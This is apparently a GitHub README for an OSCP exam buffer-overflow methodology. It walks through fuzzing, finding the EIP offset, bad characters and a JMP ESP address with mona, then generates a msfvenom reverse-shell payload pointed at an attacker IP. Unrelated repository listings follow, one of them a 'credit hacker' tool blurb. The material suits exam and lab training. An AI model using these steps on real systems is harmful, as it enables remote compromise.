This is a walkthrough about understanding the #BoF machine present in the #OSCP exam.

Overview

Buffer Overflow methodology

GitHub Repo stars GitHub last commit (branch) GitHub

Python 3 GitHub Workflow Status

Twitter Follow

Introduction

These are 7 simple python scripts and a methodology to ease (not automate !) the exploitation. Each script targets a phase of the exploitation :

  1. Trigger the BoF (this is facultative for OSCP since they give you a code snippet)
  2. Find the EIP offset
  3. Confirm the offset
  4. Find the badchars
  5. Confirm badchars + find JMP ESP instruction
  6. Confirm code execution (pop calc)
  7. Exploit host

It's based on the do stack buffer overflow good" project (BTW, it's awesomely explained).

How to use

Follow each step and you'll be able to craft a working example of a BoF exploitation.

All the specific variable are stored in 1 single resource file, to avoid any confusion during the exam.

After each step, fill the proper variables with values found and they'll be re-used for the next step

Note: If after each debug operation performed, the application has become unresponsive; Immunity Debugger should be closed first, then the "vulnapp.exe" application should be restarted, and Attach and Run should be done on Immunity Debugger.

0. Pre-start

Fill in the following variables in the resource file depending on the host to attack :

  • RHOST : the IP address of the host
  • RPORT : the port on which to access the application to exploit

1. Segmentation fault : 1_segfault.py

Send enough length string for victim system crash.

Please note that the total length to input is often given in the exmaple they provide in the exam.

Note the offeset in PARAMETERS.py, in the variable offset_eip.

2. Find the offset : 2_find_offset.py

Generate the pattern (adapt the buffer lenght) :

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <String_Length>

buf += ("<PATTERN>")

Put the output into the variable buf in 2_find_offset.py & send it.

Once the app crashes, note down the value of the EIP register (which is the address of the next operation to be executed).

If needed : convert the EIP value to ASCII : echo "<EIP_value>" | xxd -r -p

Find the offset at which the sequence is met in the pattern :

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <EIP_value>

Or, type this in Immunity Debugger : !mona findmsp.

Note the value of the EIP offet in the variable offset_eip in PARAMETERS.py, and the value of the ESP offset in the variable offset_esp.

3. Control the EIP : 3_confirm_offset.py

Execute this script as is.

In Immunity Debugger, make sure that

  • BBBB in the EIP (in hex, so 42424242)
  • CCCCDDDDD..... is written in what ESP points to

4. Find the bad chars : 4_find_badchars.py

Send it to the application

In Immunity Debugger, make mona create a list of badchars :

!mona bytearray โ€“cpb โ€œ\x00โ€

The console output will tell you where it has been saved.

Compare this file with the stack contents :

!mona compare -a ESP -f <file_with_bad_chars>
!mona compare -a <WHATEVER ADDRESS> -f <file_with_bad_chars>

**Note: **always use the full path to the file !

In the mona output, Possibly bad chars are output. Put them in the badchars array in PARAMETERS.py.

5. Confirm badchars & find a JMP ESP instruction : 5_find_jmp_esp.py

a. Confirm badchars

Make sure the badchars identified are mentionned in the PARAMETERS.py file.

Execute the script.

Re-generate a badchar sequence on mona :

!mona bytearray -cpb "\x00\x04\x05\xA2\xA3\xAC\xAD\xC0\xC1\xEF\xF0"

The console output will tell you where it has been saved.

Compare the bytearray.bin (use the full filepath) and the buffer to make sure they are the same. That will mean that no new badchar have been detected :

!mona compare -a ESP -f <file_with_bad_chars>
!mona compare -a <WHATEVER ADDRESS> -f <file_with_bad_chars>

The mona output status should be unmodified and you should get a message in the console saying : !!! Hooray, normal shellcode unmodified !!!

This mean that no other badchars have been detected.

b. Find a JMP ESP

Ask mona to find the instruction JMP ESP that will allow the processor to execute whatever we have put in the stack.

!mona jmp -r esp -cpb "<bad_chars>"       formatted like this : "\x00\x01"

Put the address returned in the variable ptr_jmp_esp in PARAMETERS.py

6. Pop calc : 6_pop_calc.py

This will confirm the code execution on the target host. This can be used to validate the build-up of the exploit, and set a working basis.

Launch this to produce the shellcode that will make calc pop on the target :

msfvenom -p windows/exec -b '<badchars>' -f python --var-name shellcode_calc \
CMD=calc.exe EXITFUNC=thread

Insert the output (python variable shellcode_calc) in the script 6_pop_calc.py.

In the script, we will also move ESP up in the stack (instruction SUB ESP,0x10) This is to avoid the ESP overwrite by the encoder of the payload. Some guys use a NOP sled, here is a more proper way ;)

Launch the script and enjoy popping calc!

7. Create shellcode : 7_exploit.py

Now, you can craft any other shellcode as long as you respect the badchars :

msfvenom -p windows/shell_reverse_tcp LHOST=<Attacker_IP> LPORT=<Attacker_Port> \
-f py -b '<badchars>' -e x86/shikata_ga_nai -var-name shellcode

Insert the output (python variable shellcode_calc) in the script 7_exploit.py.

Owner
3isenHeiM
Just a pentester knowing some python/bash, trying to make his life smarter ;) Also an Linux/CyberSec/CTF lover
3isenHeiM
Python API wrapper around Trello's API

A wrapper around the Trello API written in Python. Each Trello object is represented by a corresponding Python object. The attributes of these objects

Richard Kolkovich 904 Jan 02, 2023
Automate UCheck COVID-19 self-assessment form submission

ucheck Automate UCheck COVID-19 self-assessment form submission. Disclaimer ucheck automatically completes the University of Tornto's UCheck COVID-19

Ira Horecka 15 Nov 30, 2022
Python client for Arista eAPI

Arista eAPI Python Library The Python library for Arista's eAPI command API implementation provides a client API work using eAPI and communicating wit

Arista Networks EOS+ 124 Nov 23, 2022
Written in Python, freezed into stand-alone executable with PyInstaller. This app will make sure you stay in New World without getting kicked for inactivity.

New World - AFK Written in Python, freezed into stand-alone executable with PyInstaller. This app will make sure you stay in New World without getting

Rodney 5 Oct 31, 2021
Discord bot for playing blindfold chess.

Albin Discord bot for playing blindfold chess written in Python. Albin takes the moves from chat and pushes them on the board without showing it. TODO

8 Oct 14, 2022
Tiktok-bot - A Simple Tiktok bot With Python

Install the requirements pip install selenium pip install pyfiglet==0.7.5 How ca

Muchlis Faroqi 5 Aug 23, 2022
This bot automaticaly access to giveaway ! You can won free NFT !

This bot automaticaly access to giveaway ! You can won free NFT !

2s.py 28 Oct 20, 2022
Explorer is a Autonomous (self-hosted) Bittorrent Network Search Engine.

Explorer Explorer is a Autonomous (self-hosted) Bittorrent Network Search Engine. About The Project Screenshots Supported features Number Feature 1 DH

51 Jun 14, 2022
๐Ÿง‘โ€๐Ÿ’ผ Python wrapper for the Seek API

seek-com-au-api ๐Ÿง‘โ€๐Ÿ’ผ Python wrapper for the seek.com.au API (unofficial) Installation Using Python = 3.6: pip install -e git+https://github.com/tomq

Tom Quirk 1 Oct 24, 2021
๐—–๐ ๐ฆ๐ฉ๐ ๐ž๐ฅ ๐ฆ๐—ฅ๐ž๐—–๐ฝยฐโ„ข๏ธ ๐Ÿ‡ฑ๐Ÿ‡ฐ Is An All In One Media Inline Bot Made For Inline Your Media Effectively With Some Advance Security Toolsโ™ฅ๏ธ

๐—–๐ ๐ฆ๐ฉ๐ ๐ž๐ฅ ๐ฆ๐—ฅ๐ž๐—–๐ฝยฐ โ„ข๏ธ ๐Ÿ‡ฑ๐Ÿ‡ฐ ๐—™๐—˜๐ ๐ฉ๐—จ๐—ฅ๐—˜๐—ฆ Auto Filter IMDB Admin Commands Broadcast Index IMDB Search Inline Search Random Pics Ids & User I

Kษช๊œฑแด€ส€แด€ Pแด‡๊œฑแด€ษดแดŠษชแด›สœ Pแด‡ส€แด‡ส€แด€ ใ€„ 13 Jun 21, 2022
A simple discord bot named atticus that sends you the timetable of your classes upon request

A simple discord bot named atticus that sends you the timetable of your classes upon request. Soon, it would you ping you before classes too!

Samhitha 3 Oct 13, 2022
Unit testing AWS interactions with pytest and moto. These examples demonstrate how to structure, setup, teardown, mock, and conduct unit testing. The source code is only intended to demonstrate unit testing.

Unit Testing Interactions with Amazon Web Services (AWS) Unit testing AWS interactions with pytest and moto. These examples demonstrate how to structu

AWS Samples 21 Nov 17, 2022
A simple bot that looks for names and cpfs in the vaccination list made available by the government Fortaleza - CE

A simple bot that looks for names and cpfs in the vaccination list made available by the government Fortaleza - CE

Breno Aquino 1 Dec 21, 2021
A modern, easy to use, feature-rich, and async ready API wrapper for Discord written in Python.

A modern, easy to use, feature-rich, and async ready API wrapper for Discord written in Python. Key Features Modern Pythonic API using async and await

Senpai Development 4 Nov 05, 2021
A Simple Voice Music Player

๐Ÿ“€ ๐•๐‚๐”๐ฌ๐ž๐ซ๐๐จ๐ญ โˆš๐™๐™š๐™–๐™ขโœ˜๐™Š๐™˜๐™ฉ๐™–๐™ซ๐™š NOTE JUST AN ENGLISH VERSION OF OUR PRIVATE SOURCE WAIT FOR LATEST UPDATES JOIN @๐’๐”๐๐๐Ž๐‘๐“ JOIN @๐‚?

TeamOctave 8 May 08, 2022
IMDb + Auto + Unlimited Filter BoT

Telegram Movie Bot Features Auto Filter Manuel Filter IMDB Admin Commands Broadcast Index IMDB search Inline Search Random pics ids and User info Stat

Team AlinaX 1 Dec 03, 2021
This is a simple unofficial async Api-wrapper for tio.run

Async-Tio This is a simple unofficial async Api-wrapper for tio.run

Tom-the-Bomb 7 Oct 28, 2022
An integrated information collection tool

infoscaner ็Žฏๅขƒ้…็ฝฎ ็›ฎๅ‰infoscanerไป…ๆ”ฏๆŒๅœจlinuxไธŠ่ฟ่กŒ๏ผŒๅปบ่ฎฎ่ฟ่กŒๅœจๆœ€ๆ–ฐ็‰ˆๆœฌ็š„kaliไธญ infoscanerๆ˜ฏๅŸบไบŽpython3็‰ˆๆœฌๅฎž็Žฐ็š„๏ผŒ่ฟ่กŒไน‹ๅ‰้ฆ–ๅ…ˆๅฎ‰่ฃ…pythonๅบ“ ๅฆ‚ๆžœๅŒๆ—ถๅญ˜ๅœจpython2ๅ’Œpython3,่ฏท่พ“ๅ…ฅไปฅไธ‹ๅ‘ฝไปค pip3 install -r requi

CMACCKK 74 Sep 13, 2021
ANKIT-OS/TG-MUSIC-PLAYER a special repository. Its Is A Telegram Bot To Play To Play Music In Voice Chat

๐Ÿ”ฅ ๐ŸŽถ TG MUSIC PLAYER ๐ŸŽถ ๐Ÿ”ฅ The owner would not be responsible for any kind of bans due to the bot. โ€ข โšก INSTALLING โšก โ€ข โ€ข ๐Ÿ› ๏ธ Lแด€ษดษขแดœแด€ษขแด‡s Aษดแด… TแดแดสŸs ๐Ÿ”ฐ โ€ข

ANKIT KUMAR 1 Dec 27, 2021
Braje: a python based credit hacker tool. Hack unlimited RAJE LIKER app Credit

#ReCoded Evan Al Mahmud Irfan โœจ เถฎ BRAJE 1.0 AUTO LIKER, AUTO COMMENT AND AUTO FOLLOWER APP CREDIT HACKER TOOL About Braje: Braje is a python based cre

Evan Al Mahmud Irfan เถฎ 2 Dec 23, 2021